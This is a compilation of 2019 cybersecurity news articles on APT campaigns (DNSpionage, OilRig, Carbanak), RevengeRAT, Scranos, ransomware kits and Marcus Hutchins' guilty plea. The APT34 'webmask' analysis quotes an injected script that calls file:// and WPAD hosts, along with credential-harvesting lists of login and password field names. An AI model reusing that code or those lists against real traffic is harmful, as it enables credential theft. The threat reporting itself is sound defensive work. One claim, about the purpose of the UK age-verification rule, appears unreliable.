Unlike previous attacks, the group is now using a new malware, tracked as Karkoff, for reconnaissance purposes. Karkoff is used by hackers to surgically select a target and remain under the radar, it allows to gather system information related to the workstation environment, operating system, domain, and list of running processes on the victims’ machine.

Karkoff is developed in .NET, it also allows attackers to remotely execute arbitrary code on compromised hosts.

The experts link the DNSpionage and Karkoff malware after observing overlaps between their C2 infrastructure.

Experts noticed that the malware searches for two specific anti-virus solutions, Avira and Avast. If one of them is installed on the target system, a specific flag will be set, and some options from the configuration file will be ignored.

Researchers at Talos noticed that the Karkoff malware generates a log file on the compromised machine which tracks all commands it has executed and related timeline.

“From an incident response point of view, it’s interesting to note that the malware generates a log file: C:\\Windows\\Temp\\MSEx_log.txt. The executed commands are stored in this file (xored with ‘M’) with a timestamp.” continues the experts. “This log file can be easily used to create a timeline of the command execution which can be extremely useful when responding to this type of threat. With this in mind, an organisation compromised with this malware would have the opportunity to review the log file and identify the commands carried out against them.” “

Attackers behind the DNSpionage campaigns continue to be focused on entities in the Middle Eastern region, including Lebanon and the United Arab Emirates (UAE).

“The threat actor’s ongoing development of DNSpionage malware shows that the attacker continues to find new ways to avoid detection.” “DNS tunneling is a popular method of exfiltration for some actors and recent examples of DNSpionage show that we must ensure DNS is monitored as closely as an organization’s normal proxy or weblogs.” concludes Talos. “The discovery of Karkoff also shows the actor is pivoting and is increasingly attempting to avoid detection while remaining very focused on the Middle Eastern region.”

Pierluigi Paganini

(SecurityAffairs – hacking, DNSpionage)

The post OilRig APT uses Karkoff malware along with DNSpionage in recent attacks appeared first on Security Affairs.

FireEye experts found source code for CARBANAK malware on VirusTotal

Cybersecurity researchers from FireEye revealed that the Carbanak source code has been available on VirusTotal for two years, and none noticed it before.

Researchers at FireEye discovered that the Carbanak source code has been available on VirusTotal for two years, but it was not noticed before.

The Carbanak gang (aka FIN7, Anunak or Cobalt) stole over a billion euros from banks across the world, the name “Carbanak” comes with the name of the malware they used to compromise computers at banks, other financial institutions, restaurants, and other industries.

CARBANAK cybercrime gang was first uncovered in 2014 by Kaspersky Lab that dated its activity back to 2013 when the group leveraged the Anunak malware in targeted attacks on financial institutions and ATM networks. Between 2014 and 2016 the group used a new custom malware dubbed Carbanak that is considered a newer version of Anunak.

Starting from 2016 the group developed a new custom malware using Cobalt Strike, a legitimate penetration testing framework.


The experts discovered the source code, builders, and some previously unknown plugins in two different RAR archives.

The two archives were both uploaded two years ago from the same Russian IP address.

“On the heels of that publication, our colleague Nick Carr uncovered a pair of RAR archives containing CARBANAK source code, builders, and other tools (both available in VirusTotal: kb3r1p and apwmie).” reads a blog post published by FireEye.

“CARBANAK source code was 20MB comprising 755 files, with 39 binaries and 100,000 lines of code. Our goal was to find threat intelligence we missed in our previous analyses.”

Last year, law enforcement arrested between January and June three Ukrainian suspects, Dmytro Fedorov, Fedir Hladyr, and Andrii Kopakov.

Fedorov, is a skilled hacker and, who is suspected to be a manager of the group, was arrested at the request of U.S. officials in Bielsko-Biala, Poland, in January and is currently waiting for his extradition to the United States.

In January 2018 foreign authorities also arrested Fedir Hladyr in Dresden, Germany, he is currently detained in Seattle pending trial.  Hladyr is suspected to be a system administrator for the group.

In late June 2018, foreign authorities arrested Andrii Kolpakov in Lepe, Spain.  The man is suspected to be a supervisor of the group. He is currently detained in Spain pending the United States’ request for extradition.

Pierluigi Paganini

(SecurityAffairs – Carbanak, Russia)

The post FireEye experts found source code for CARBANAK malware on VirusTotal appeared first on Security Affairs.

Iran-linked APT34: Analyzing the webmask project

Security expert Marco Ramilli published the findings of a quick analysis of the webmask project standing behind the DNS attacks implemented by APT34 (aka OilRig and HelixKitten).

Thanks to the leaked source code it is now possible to check APT34 implementations and techniques.


Since at least 2014, an Iranian threat group tracked by FireEye as APT34 has conducted reconnaissance aligned with the strategic interests of Iran. The group conducts operations primarily in the Middle East, targeting financial, government, energy, chemical, telecommunications and other industries. Repeated targeting of Middle Eastern financial, energy and government organisations leads FireEye to assess that those sectors are a primary concern of APT34. The use of infrastructure tied to Iranian operations, timing and alignment with the national interests of Iran also lead FireEye to assess that APT34 acts on behalf of the Iranian government. (Source: MISP Project).

On April 19 2019 researchers at Chronicle, a security company owned by Google’s parent company, Alphabet, have examined the leaked tools, exfiltrated the past week on a Telegram channel, and confirmed that they are indeed the same ones used by the OilRig attackers. OilRig has been connected to a number of intrusions at companies and government agencies across the Middle East and Asia, including technology firms, telecom companies, and even gaming companies. Whoever is leaking the toolset also has been dumping information about the victims OilRig has targeted, as well as data identifying some of the servers the group uses in its attacks.

According to Duo, OilRig delivered Trojans that use DNS tunneling for command and control in attacks since at least May 2016. Since May 2016, the threat group has introduced new tools using different tunneling protocols to their tool set” Robert Falcone of Palo Alto Networks’ Unit 42 research team wrote in an analysis of the group’s activities.

“Regardless of the tool, all of the DNS tunneling protocols use DNS queries to resolve specially crafted subdomains to transmit data to the C2 and the answers to these queries to receive data from the C2.”

Leaked Source code

The initial leaked source code sees three main folders: webmask, poisonfrog and Webshells_and_Panel. While webmask and poisonfrogseems to be single projects, the folder Webshells_and_Panel looks like wrapping more projects into a single bucket. But, for today, let’s focus on webmask.

WEBMask Focus

The webmaskk project, in my personal opinion, is an APT34 distinction since implementing their DNS attack core. APT34 is well-known to widely use DNS Hijacking in order to redirect victims to attackers websites. So let’s see what they’ve implemented so far on this direction.

The webmask project comes with both: a guide (guide.txt) and an installation script ( From the latter we might appreciate the NodeJS installed version which happens to be 6.X. This version was released on 2016-04-26 for the first time. Nowadays is still on development track as the name of “Boron”. According to the NodeJS historic versioning that project could not be dated before April 2016 since Nodejs_6.x was not existing before that date. The guide.txt file suggests two solutions (this is the used term) both of them base their ‘core engine’ on a developed DNS server, used as authoritative name servers to respond crafted ‘A’ records to specific requests. The attackers suggest to use solution2 (they write “use this” directly on configuration file), the one who implements DNS server in NodeJS language. On the other side the Solution1 uses python as DNS server. The following image shows the suggested Solution.

APT34: WebMask Project Suggested Solution

Some domain names and some IPs are used as configuration example. Personally I always find interesting to see the attacker suggested examples, since they lets a marked flavour of her. That time the attacker used some target artefacts (IP and DNS) belonging to ‘Arab Emirates’ net space while she used as a responsive artefact (the one used to attack) an IP address belonging to a NovinVPS service.

The guide follows on describing the setup of ICAP proxy server, used to proxy the victims to the real destination but trapping the entire connections. The attacker suggests Squid3 and guides the operator to install and to configure it. She uses as ICAP handler a simple python script placed into icap/icap.pyfolder. This script has been developed in order to log and to modify the ICAP/connection flow coming from squid3 proxy. Then a well-known Haproxy is used as High Availability service for assuring connections and finally certbot (Let’s Encrypt) is used to give valid certificate to squid3 (but it’s not a mandatory neither a suggested step).

DNS Server scripts

In the folder dns-redir 3 files are placed. A configuration file called config.json is used by The python script implements a class named MyUDPHandler which is given to the native SocketServer.UDPServer and used as UDP handler. The script overrides only DNS A records if included into the overrides object (variable at the beginning of source code). In other words if the DNS request is an A record and if the requested name belongs to specific domain name, the script responds with the attacker IP address. The following image shows the main 3 steps of the override chain. Three steps DNS overriding chain

According to the guide.txt the suggested solution won’t be the, but the attacker would prefer the dnsd.js script. This script appears not externally configurable (it does not import config.json) so if you want to configure it you need to manually edit the script source code. The source is written in an classic style ECMAScript without any fancy or new operators/features introduced in ECMAScript6 and ECMAScript7. The dnsd.js performs the same tasks performed by without any specific change.

ICAP script

In the icap folder a python script called is placed. This script handles ICAP flows coming from squid3, extracts desired informations and injects tracking pixels. The python script implements a ThreadingSimpleServer as an implementation of SocketServer.ThreadingMixInwhich is a native framework for multi-threading Network servers. SocketServer.ThreadingMixIn needs a local address and local port to be spawned and a BaseICAPRequestHandler class as second parameter in order to handle ICAP flows. The attacker specialised that class by referring to the general ICAPHandler. Aims of the script is to log into separated files the following information: credentials, cookies, injected files and headers. It silently injects a tracking pixel into communications by adding the following javascript to HTML body.

script = ';$(document).ready(function(){$(\'<img src="file://[ip]/resource/logo.jpg"><img src="http://WPAD/avatar.jpg">\');});'

If the parsed request is a HTTP POST the ICAPHandler tries to extract credentials through special function called: extract_login_password. The following image shows the process flow of the credential extraction. Credential Extraction Process

It would be interesting, at least in my point of view, to check the used patterns as login detection. For example the parsing function looks for the following “form names”:

logins = ['login', 'log-in', 'log_in', 'signin', 'sign-in', 'logon', 'log-on']

It also looks for the following user field names:

userfields = ['log','login', 'wpname', 'ahd_username', 'unickname', 'nickname', 'user', 'user_name','alias', 'pseudo', 'email', 'username', '_username', 'userid', 'form_loginname', 'loginname',
 'login_id', 'loginid', 'session_key', 'sessionkey', 'pop_login', 'uid', 'id', 'user_id', 'screename', 'uname', 'ulogin', 'acctname', 'account', 'member', 'mailaddress', 'membername', 'login_username', 'login_email', 'loginusername', 'loginemail', 'uin', 'sign-in', 'usuario']

and finally it also looks for the following password fields names:

passfields = ['ahd_password', 'pass', 'password', '_password', 'passwd', 'session_password', 'sessionpassword', 'login_password', 'loginpassword', 'form_pw', 'pw', 'userpassword', 'pwd', 'upassword', 'login_password','passwort', 'passwrd', 'wppassword', 'upasswd','senha','contrasena', 'secret']

Interesting to see specific string patterns such as (but not limited to): form_pw, ahd_password, upassword, senha, contrasena, which are quite indicative to victim scenarios. For example strings such as: senha, contrasena,usuario, and so on seems to be related to”Spanish” / “Portuguese” words. So if it’s true (and google translate agrees with me) it looks like APT34 are proxying some connections that might have those username and password fields, which might refer to “Spanish”/”Portuguese” targets. But this is only a Hypothesis.

The is able to intercept basic authentication headers, cookies and general headers as well, implementing similar functions able to extract interesting information and eventually to modify them if needed. I wont describe every single functions but one of the most interesting function that is worth of being showed is the inject_RESPMOD which injects a tracking image into the ICAP flow. The following image shows the attacker’s implementation of the Injection_RESPMOD function. script injection function

The injected script is added to the HTML body and eventually is GZipped and shipped back. In such a way the attacker tracks who is landing to the target domain.

Interesting points

  • WebMask is >= April 2016 (From Installed Dependencies)
  • APT34 might target ‘Arab Emirate’ (From examples into config files)
  • APT34 might target Spanish/Portuguese (From code into the extract_login_password function )
  • APT34 might use NovinVPS (From examples into config files)
  • APT34 needs credentials for change Authoritative DNS (From guide.txt)

The original post is available at the following URL:

About the Author: Marco Ramilli founder of Yoroi

I am a computer security scientist with an intensive hacking background. I do have a MD in computer engineering and a PhD on computer security from University of Bologna. During my PhD program I worked for US Government (@ National Institute of Standards and Technology, Security Division) where I did intensive researches in Malware evasion techniques and penetration testing of electronic voting systems.

I do have experience on security testing since I have been performing penetration testing on several US electronic voting systems. I’ve also been encharged of testing uVote voting system from the Italian Minister of homeland security. I met Palantir Technologies where I was introduced to the Intelligence Ecosystem. I decided to amplify my cybersecurity experiences by diving into SCADA security issues with some of the biggest industrial aglomerates in Italy. I finally decided to found Yoroi: an innovative Managed Cyber Security Service Provider developing some of the most amazing cybersecurity defence center I’ve ever experienced! Now I technically lead Yoroi defending our customers strongly believing in: Defence Belongs To Humans

Edited by Pierluigi Paganini

(Security Affairs – APT34, DNS attacks)

The post Iran-linked APT34: Analyzing the webmask project appeared first on Security Affairs.

Campaign leverages, BlogSpot, and Pastebin to distribute RevengeRAT

Palo Alto Networks Unit 42 researchers uncovered a malicious campaign targeting entities in North America, Europe, Asia, and the Middle East with RevengeRAT.

The campaign was carried out during March, threat actors tracked as
Aggah” used pages hosted on, BlogSpot, and Pastebin as a command-and-control (C2) infrastructure to distribute the RevengeRAT.

Attackers hit organizations in several industries including Technology, Retail, Manufacturing, State/Local Government, Hospitality, Medical, and other Professional business.

“In March 2019, Unit 42 began looking into an attack campaign that appeared to be primarily focused on organizations within a Middle Eastern country.” reads the analysis published by Palo Alto Networks.

“Further analysis revealed that this activity is likely part of a much larger campaign impacting not only that region but also the United States, and throughout Europe and Asia.”

The usage of legitimate services to deliver the malware aims at avoiding detection.

RevengeRAT variants were used by different APT groups, such as The Gorgon Group, that hit entities in the UK, Spain, Russia and in the US. The source code of the RAT has been publicly leaked a few years ago and could be actually part of multiple campaigns conducted by several threat actors. 

RevengeRAT allows to open remote shells on the infected system, manage system files, processes, and services, log keystrokes, edit the Windows Registry, edit the hosts file, dump users passwords, and access the webcam, and many more actions.

Researcher an analyzed a bait document built to load a malicious macro-enabled document from a remote server via Template Injection.

“These macros use BlogSpot posts to obtain a script that uses multiple Pastebin pastes to download additional scripts, which ultimately result in the final payload being RevengeRAT configured with a duckdns[.]org domain for C2.” continues the analysis.

“During our research, we found several related delivery documents that followed the same process to ultimately install RevengeRAT hosted on Pastebin, which suggests the actors used these TTPs throughout their attack campaign.”

Once the victims opened the decoy document, it will display a lure image designed to trick them into turning on Microsoft Office macros to “Enable Editing.” If the victim enables the macros, a remote OLE document containing the malicious macro would be loaded using template injection.

The OLE file loaded an embedded Excel document which would download a malicious script from a shortened URL using the service. In a similar way, the malicious code was also downloaded in other attacks from a Blogspot domain hosting a malicious JavaScript.

“The malicious script carries out several activities on the compromised system. First, it attempts to hamper Microsoft Defender by removing its signature set. The script also kills the Defender process along with the processes for several Office applications.” reads the analysis.

Experts pointed out that the technique of enabling macros and disabling ProtectedView in Office and the tactic of killing processes for Windows Defender and Microsoft Office applications were employed by Gorgon group in past campaigns. 

Once downloaded on a victim’s machine, the script will perform the following main actions:

Downloading a payload from a Pastebin URL
• Creating a scheduled task to periodically obtain and run a script from a Pastebin URL
• Creating an autorun registry key to obtain and run a script from a Pastebin URL

The last stage malware is downloaded from Pastebin, it is a RevengeRAT variant dubbed “Nuclear Explosion” that uses the lulla.duckdns[.]org domain as C2.


The analysis of a single shortened URL revealed it was clicked over 1,900 times by targets from roughly 20 countries, this data could give us an idea of the extent of the campaign.

The analysis of decoy document’s properties allowed the experts to discover a number of other RevengeRAT samples used in this campaign.

Despite this, the Palo Alto Networks researchers conclude that there is no “concrete evidence that this attack campaign is associated with Gorgon.”

Pierluigi Paganini

(SecurityAffairs – hacking, RevengeRAT)

The post Campaign leverages, BlogSpot, and Pastebin to distribute RevengeRAT appeared first on Security Affairs.

Sure Sense AI Technology Promises Less Malware Infection In HP Laptops

The term Artificial Intelligence for at least the last five years was abused and still being abused by many marketing teams. It is like the magic word that may help the company persuade more buyers of an electronic product or a web service. Yes, there is real artificial intelligence in some products like a console game, where the antagonists and NPCs (Non-playable characters) are controlled by artificial intelligence.

But what about a regular computer, such as an off-the-shelf laptop, is Artificial Intelligence in it useful at all? That is something HP is trying to convince its potential customers with their Elitebook 800 laptop series for 2019. The AI technology they built on the laptops under the Elitebook 800 series is dubbed as “Sure Sense”, designed to help prevent malware for corporate workstation-class laptops through the use of hardware-based heuristics detection.

This goes beyond every security technology today because today most primarily block against known malware. This [blocks] both known and unknown malware. It’s able to detect never-before-seen malware, and stop 99 percent of them in less than 20 seconds,” explained Alex Cho, HP’s Personal Systems Business President.

The Sure Sense technology is built-in with the UEFI of the Elitebook 800 laptops, which protects the firmware from being overwritten and tampered by external software not approved by HP. Sure Sense also interacts with Windows 10, hardening the PC from malicious files and phishing links.

One small breach can be catastrophic. You’ve sort of got to fight fire with fire. Malware is being created with AI, so you need to attack it with AI. It’s the brain that says, ‘I know what malware looks like—and this looks like a malware, this smells like a malware, it is malware. (Sure Sense will) be able to process that in real time—do it in the time it takes to open a file—and shut that process down,” added Cho.

It is not yet known how successful Sure Sense technology will be against malware, especially the top two types that give companies a run for their money, the ransomware, and crypto jacking. Intel and AMD more than a decade ago tried aggressively to prevent malware or even any software from executing code from is stored in the data buffer. Also, known as Execute Disable Bit, it lessens the effectiveness of malware as processors that have Execute Disable Bit strictly executes code only under the instruction cache.

What they’re doing with AI, that is just far beyond what we’ve ever seen before. This is the active mitigation of attacks on a machine in real time. It’s a huge announcement for HP to get into that game. That’s not a traditional HP play. You’ve got firewall vendors that do this at the edge, you’ve got infrastructure vendors that do this on the internal side of the network, and then you have software manufacturers that are doing this on the endpoint. That disrupts a lot of things that we’re used to doing in the IT space,” said Juan Fernandez, ImageNet Consulting VP of Managed IT Services, when asked for feedback about HP Sure Sense.

Related Blogs:

Adopting Artificial Intelligence in Your Business

Web Malware Attack: The Different Stages

Core Factors of Artificial Intelligence to Enhance Cybersecurity

The post Sure Sense AI Technology Promises Less Malware Infection In HP Laptops appeared first on .

Security Affairs newsletter Round 210 – News of the week

A new round of the weekly SecurityAffairs newsletter arrived!

The best news of the week with Security Affairs.

Kindle Edition

Paper Copy

Digging The Deep Web

Once again thank you!

Attackers hacked support agent to access Microsoft Outlook email accounts
Major coordinated disinformation campaign hit the Lithuanian Defense
Romanian duo convicted of fraud Scheme infecting 400,000 computers
Security Affairs newsletter Round 209 – News of the week
Whatsapp, Instagram, Facebook down worldwide
A new DDoS technique abuses HTML5 Hyperlink Audit Ping in massive attacks
Apache fixed an important RCE flaw in Tomcat application server
Gnosticplayers round 5 – 65 Million+ fresh accounts from 6 security breaches available for sale
Gnosticplayers round 5 – 65 Million+ fresh accounts from 8 security breaches available for sale
Locked Shields 2019 – Chapeau, France wins Cyber Defence Exercise
Yellow Pencil WordPress Plugin flaw expose tens of thousands of sites
Adblock Plus filter can be exploited to execute arbitrary code in web pages
Blue Cross of Idaho data breach, 5,600 customers affected
CVE-2019-0803 Windows flaw exploited to deliver PowerShell Backdoor
Ecuador suffered 40 Million Cyber attacks after the Julian Assange arrest
FireEye releases FLASHMINGO tool to analyze Adobe Flash files
Scranos – A Cross Platform, Rootkit-Enabled Spyware rapidly spreading
A new variant of HawkEye stealer emerges in the threat landscape
Code execution – Evernote
eGobbler hackers used Chrome bug to deliver 500Million+ ads to iOS users
European Commission is not in possession of evidence of issues with Kaspersky products
Justdial is leaking personal details of all customers real-time
RCE flaw in Electronic Arts Origin client exposes gamers to hack
Analyzing OilRigs malware that uses DNS Tunneling
APT28 and Upcoming Elections: evidence of possible interference (Part II)
Cisco addresses a critical bug in ASR 9000 series Routers
Drupal patched security vulnerabilities in Symfony, jQuery
Facebook ‘unintentionally collected contacts from 1.5 Million email accounts without permission
Russian TA505 threat actor target financial entities worldwide
Broadcom WiFi Driver bugs expose devices to hack
Facebook admitted to have stored millions of Instagram users passwords in plaintext
Operator of Codeshop Cybercrime Marketplace Sentenced to 90 months in prison
Ransomware attack knocks Weather Channel off the Air
Source code of tools used by OilRig APT leaked on Telegram
Avast, Avira, Sophos and other antivirus solutions show problems after
Google is going to block logins from embedded browsers against MitM phishing attacks
Hacker broke into super secure French Governments Messaging App Tchap hours after release
Marcus Hutchins pleads guilty to two counts of banking malware creation

Pierluigi Paganini

(SecurityAffairs – newsletter)

The post Security Affairs newsletter Round 210 – News of the week appeared first on Security Affairs.

INPIVX hidden service, a new way to organize ransomware attacks

A new service called Inpivx represents the evolution of the ransomware-as-a-service making it very easy for wannabe crooks to develop their malware and build a management panel.

A new Tor hidden service called Inpivx evolves the concept of the ransomware-as-a-service making it very easy for crooks without technical skills to develop their own malware and build a management panel.

Operators behind the service offer for sale the source code for the ransomware and for the management dashboard. The availability of the source code allows crooks to customize their ransomware.

Watch out, Inpivx is not a RaaS and for this reason, it does not supply hosting services.

The ransomware is written in C++ and supports almost any Windows OS version, from Windows XP through Windows 10, while the dashboard is coded in PHP.

The package goes for $500, it also includes the decryption tool, operators also provide a detailed tutorial.

“If the client has no skill, we provide a tutorial based on our own ransomware dashboard each line of code has an explanation,” an Inpivx member told BleepingComputer.

The dashboard provides infection data in real time, it includes the total number of encrypted files, number of infections, the operating systems of the infected machines and their geographical distribution.

It also implements a chat that allows operators to communicate with the victims.

A specific clients section includes information on infected machines, such as the victim IDs, the operating system, the ransom price, the decryption key, and the payment status.

“Inpivx approach is highly likely to attract to the ransomware game individuals with expertise in other areas of the crime business.” wrote Ionut Ilascu from BleepingComputer. “With access to the source code, they can alter the original ransomware product and create new strains that could evolve to something new by combining code from other malware.”

Pierluigi Paganini

(SecurityAffairs – Tor, Inpivx)

The post INPIVX hidden service, a new way to organize ransomware attacks appeared first on Security Affairs.

Marcus Hutchins pleads guilty to two counts of banking malware creation

British malware researcher Marcus Hutchins has pleaded guilty to developing and sharing the banking malware between July 2014 and July 2015.

The popular British cybersecurity expert Marcus Hutchins has pleaded guilty to developing and sharing the Kronos banking malware
between July 2014 and July 2015.

Marcus Hutchins, also known as MalwareTech, made the headlines after discovering the “kill switch” that halted the outbreak of the WannaCry ransomware. In August 2017, he was arrested in Las Vegas after attending the Def Con hacking conference and was detained by the FBI in the state of Nevada.

In August 2017, Marcus Hutchins pleaded not guilty to charges of creating and selling malware at a hearing in Milwaukee, Wisconsin.
The court decided to relax the expert bail terms, allowing him to access the Internet and continues his ordinary working activities. The only restriction on Hutchins is that the expert cannot visit the Wannacry server domain.

The decision is unusual because computer crime suspects are not allowed to stay online.

The court allowed him to live in Los Angeles, where the company that hired him is located, but he was obliged to surrender his passport and he must wear a tracking device until his trial in October.

On Friday, Hutchins accepted a plea deal and admitted two charges of malware development.

“I’ve pleaded guilty to two charges related to writing malware in the years prior to my career in security,” reads a statement published by the expert.

“I regret these actions and accept full responsibility for my mistakes. Having grown up, I’ve since been using the same skills that I misused several years ago for constructive purposes. I will continue to devote my time to keeping people safe from malware attacks.”

Marcus Hutchins would face with a maximum penalty of five years in prison a $250,000 fine and a year of probation.

According to the Federal law enforcement, the researchers told an unnamed associate over a recorded telephone line: “I used to write malware, they picked me up on some old shit,” “I wrote code for a guy a while back who then incorporated it into a banking malware.”

Pierluigi Paganini

(Security Affairs – Marcus Hutchins, cybercrime)

The post Marcus Hutchins pleads guilty to two counts of banking malware creation appeared first on Security Affairs.

Scranos Rootkit Auto-Subscribes Users To Selected Youtube Channels

Youtube channels and malware are not the usual words we can use in just one sentence, but that is changing, as a new prolific rootkit-based malware named Scranos is causing havoc in the wild. It is the first known malware that automatically “subscribes” logged-in Google accounts to specific Youtube channels that the command and control center dictates. This seemed to be the case in order to augment the “profitability” of the virus beyond its regular function of keylogging the user to steal his login credentials to various web services such as Facebook, Amazon, AirBnB, and Youtube. The malware is compatible with mainstream browsers, which means it can auto-subscribes the user to those channels in hopes of better income stream. It is not yet concluded if the specific Youtube channel where the user was silently subscribed with are related to Scranos’ authors.

“The motivations are strictly commercial. They seem to be interested in spreading the botnet to consolidate the business by infecting as many devices as possible to perform advertising abuse and to use it as a distribution platform for third party malware,” said Bog Botezatu, Bitdefender’s Director of Threat Research and Reporting.

Bitdefender is advising people to be careful when downloading random video playback and e-book reader apps, as Scranos is delivered as a payload of trojan apps. Trojan apps are real copies of apps it claims to be, but with included payload, usually malware code. “By using this approach, the hackers are more likely to infect targets. They are looking at advertising fraud by consuming ads on their publisher channels invisibly in order to pocket the profit. They are growing accounts that they have been paid to grow and helping inflate an audience so they can grow specific ‘influencer’ accounts,” added Botezatu. With a modular formula, more functionalities can be added to Scranos by its authors. At the moment, the malware can extract browsing history, account payment information, and display adverts which can generate more profit to the virus authors.

The malware after silently watches the computer, once the user logs in to Facebook, it can then extract the user data (Facebook allows users to download their data manually). “If the user is logged into a Facebook account, it impersonates the user and extracts data from the account by visiting certain web pages from the user’s computer, to avoid arousing suspicion by triggering an unknown device alert. It can extract the number of friends, and whether the user administrates any pages or has payment information in the account. This is an extremely sophisticated threat that took a lot of time and effort to set up. Rootkit-based malware shows an unusual level of sophistication and dedication,” concluded Botezatu.

Upon further probing, it was disclosed that the malware also includes functionality that interacts with Amazon website, which can store Amazon information and capability to interact with Amazon account through the use of a specially designed DLL file. Scranos has no clear target countries, but the most number of infection cases were seen in Italy, Indonesia, Romania, India, Brazil, and France.

Related Resources:

Youtube Video Content Creators and Channel Subscribers Cautioned Of Malicious Posers

YouTube to Increase Security Across Its Office Worldwide

Malicious YouTube ads used to mine cryptocurrency

The post Scranos Rootkit Auto-Subscribes Users To Selected Youtube Channels appeared first on .

Marcus Hutchins: UK ransomware ‘hero’ pleads guilty to US hacking charges

Hutchins says he regrets his actions and will continue ‘keeping people safe from malware attacks’

A British computer security researcher once hailed as a “hero” for helping stem a ransomware outbreak and later accused of creating malware to attack the banking system said on Friday he had pleaded guilty to US criminal charges.

Marcus Hutchins, whose arrest in 2017 stunned the computer security community, acknowledged in a statement pleading guilty to criminal charges linked to his activity in 2014 and 2015.

Related: UK hacker jailed for six years for blackmailing pornography site users

Continue reading...

Cyber News Rundown: Phishing Attack on Global IT Outsourcer

Reading Time: ~2 min.

Major IT Outsourcer Suffers After Phishing Attack

Global IT services provider Wipro announced they are in the process of investigating a data possibly affecting some of their clients. These types of companies are popular for hackers because, by breaching a single IT service company, they gain access to a far larger pool of victims through compromised credentials belonging to client networks. It’s still unclear how long the hackers had access to the systems, but some reports claim the attack was ongoing for several months.

Age-Verification Hits UK Porn Viewers

The UK has passed a measure that will subject users to age-verifications before being allowed to enter a pornographic website, as part of their ongoing fight to make the UK safer online. This measure was originally introduced as a way to decrease ransomware infections and slow the stream of stolen credentials from paid accounts for higher-traffic sites. The new law has an 88% backing from UK parents and will go into full effect on July 15.

Data Breach Affects Navicent Patients

A recent Navicent Health announcement revealed the email systems of the health care services provider were compromised in July, 2018, possibly affecting over 275,000 patients. While the remainder of their internal systems were untouched, the email server did contain patient data, including social security numbers and billing information. Fortunately, Navicent responded to the breach quickly and began notifying the proper authorities, as well as their client base, in addition to providing identity monitoring services for those whose information was exposed.

Chrome for iOS Bug Redirects Users to Ads

A new bug, found only in the iOS version of Chrome, has exposed up to half a million users to unwanted advertising redirects, sometimes from legitimate websites. The bug works by allowing malicious code to be executed from within page advertisements, which can then overlay onto the device’s screen until clicked. The majority of this campaign’s victims are based in the US and were targeted over a four-day period in early April.

Microsoft Loses Subdomain for Live Tiles

A German researcher recently took control of a subdomain used by Microsoft to assist websites with correctly formatting RSS feeds into a usable XML format for Windows 8 and 10 Live Tiles. Because the subdomain wasn’t registered to Microsoft or their Azure cloud services, and any malicious actor could have compromised the domain, the researcher purchased it and alerted Microsoft of his findings.

The post Cyber News Rundown: Phishing Attack on Global IT Outsourcer appeared first on Webroot Blog.

Analyzing OilRig’s malware that uses DNS Tunneling

Iran-linked APT group OilRig is heavily leveraging on DNS tunneling for its cyber espionage campaigns, Palo Alto Networks reveals.

Security researchers at Palo Alto Networks reported that Iran-linked APT group OilRig is heavily leveraging on DNS tunneling for its cyber espionage campaigns, Palo Alto Networks reveals.

OilRig is an Iran-linked APT group that has been around since at least 2014, it targeted mainly organizations in the financial, government, energy, telecoms and chemical sectors in the United States and Middle Eastern countries.

Many of the malware used by the group in the attacks over the years use DNS tunneling to protect communications with the command and control (C&C) infrastructure.

Experts pointed out that DNS tunneling clearly represents one of the preferred communication methods of the group.

OilRig usage of DNS tunneling was first documented in 2016, some of the Trojans in its arsenal using it are Helminth, ISMAgent, QUADAGENT
BONDUPDATER, and ALMACommunicator.

DNS tunnelling OilRig

The analysis of the tunneling protocols used by the OilRig suggests:

  • All subdomains contain a randomly generated value to avoid the DNS query resulting in a cached response
  • Most rely on an initial handshake to obtain a unique system identifier
  • Most rely on hardcoded IP addresses within the DNS answers to start and stop data transfer
  • Data upload includes a sequence number that allows the C2 to reconstruct the uploaded data in the correct order
  • Depending on the tool, A, AAAA, and TXT query types have been used by OilRig for tunneling
  • All of the DNS tunneling protocols will generate a significant number of DNS queries

“Regardless of the tool, all of the DNS tunneling protocols use DNS queries to resolve specially crafted subdomains to transmit data to the C2 and the answers to these queries to receive data from the C2.” reads the analysis published by Palo Alto Networks. “Therefore, the protocols must abide by the DNS protocol, so the specially crafted subdomains must have labels (portions of the subdomain separated by periods) must start and end with a letter or digit, contain letters, digits and hyphens and be less than 63 characters in length. Also, the entire domain queried, which includes the C2 domain and the specially crafted subdomain cannot exceed 253 characters.”

All the tools leverage DNS queries to resolve specially crafted subdomains and send data to the command and control servers. The tools use protocols in different ways, they differ for the structure of the subdomains queried, for the data received by the Trojans, for the subdomains used to transmit data.

Experts observed multiple variants of the Helminth backdoor over the years all using the same DNS Type A, but the threat actors are able to change the generated subdomains to avoid detection.

“There are several variants of Helminth, as the OilRig actors actively developed this Trojan during the course of their attack campaigns. The Helminth Trojan came in two forms, a portable executable version and a PowerShell version, both of which received updates to their DNS tunneling protocol over time.” continues the analysis. “The DNS tunneling protocols used in each variant operated the same way, but the developer would make changes to the generated subdomains to make them look visually different to evade detection.”

OilRig also used the ISMAgent in many campaigns, the malware uses the DnsQuery_A API function to issue DNS AAAA requests to resolve custom subdomains. Before transmitting the data, the Trojan issues a beacon to inform the server it is ready.

OilRig also leveraged two variants of the ALMA Communicator in its attacks, each of them using a different domain structure. The two variants sent different information to the server and the formatted data within the DNS tunneling protocol in different ways.

Palo Alto researchers also documented different variants of both the BONDUPDATER tool and QUADAGENT Trojan, the latter uses AAAA queries to transmit/receive data via DNS tunneling.

“This threat group saw the benefits of using DNS tunneling, as DNS is almost universally allowed through security devices.” Palo Alto Networks concludes. “One major drawback of using DNS tunneling is the high volume of DNS queries issued to transmit data back and forth between the tool and the C&C server, which may stand out to those monitoring DNS activity on their networks,”

Pierluigi Paganini

(SecurityAffairs – hacking, OilRig)

The post Analyzing OilRig’s malware that uses DNS Tunneling appeared first on Security Affairs.

This Week in Security News: Medical Malware and Monitor Hacks

Welcome to our weekly roundup, where we share what you need to know about the cybersecurity news and events that happened over the past few days. This week, learn how baby monitors may be susceptible to hacking. Also, learn about a medical flaw that enables hackers to hide malware.

Read on:

Is Your Baby Monitor Susceptible to Hacking?

In a number of high-profile cases, home surveillance cameras have been easily compromised and disturbing reports of hacked baby monitors are in the news. 


Global Governments Demonstrate Rising Commitment to Cybersecurity

According to the International Telecommunications Union’s (ITU) 2018 Global Cybersecurity Index, only half of countries around the globe had a government cybersecurity strategy in 2017, which rose to 58 percent in 2018.

What Did We Learn from the Global GPS Collapse?

The problem highlights the pervasive disconnect between the worlds of IT and OT.

Malware Creates Cryptominer Botnet Using EternalBlue and Mimikatz

A malware campaign is actively attacking Asian targets using the EternalBlue exploit and taking advantage of Living off the Land (LotL) obfuscated PowerShell-based scripts to drop Trojans and a Monero coinminer on compromised machines.

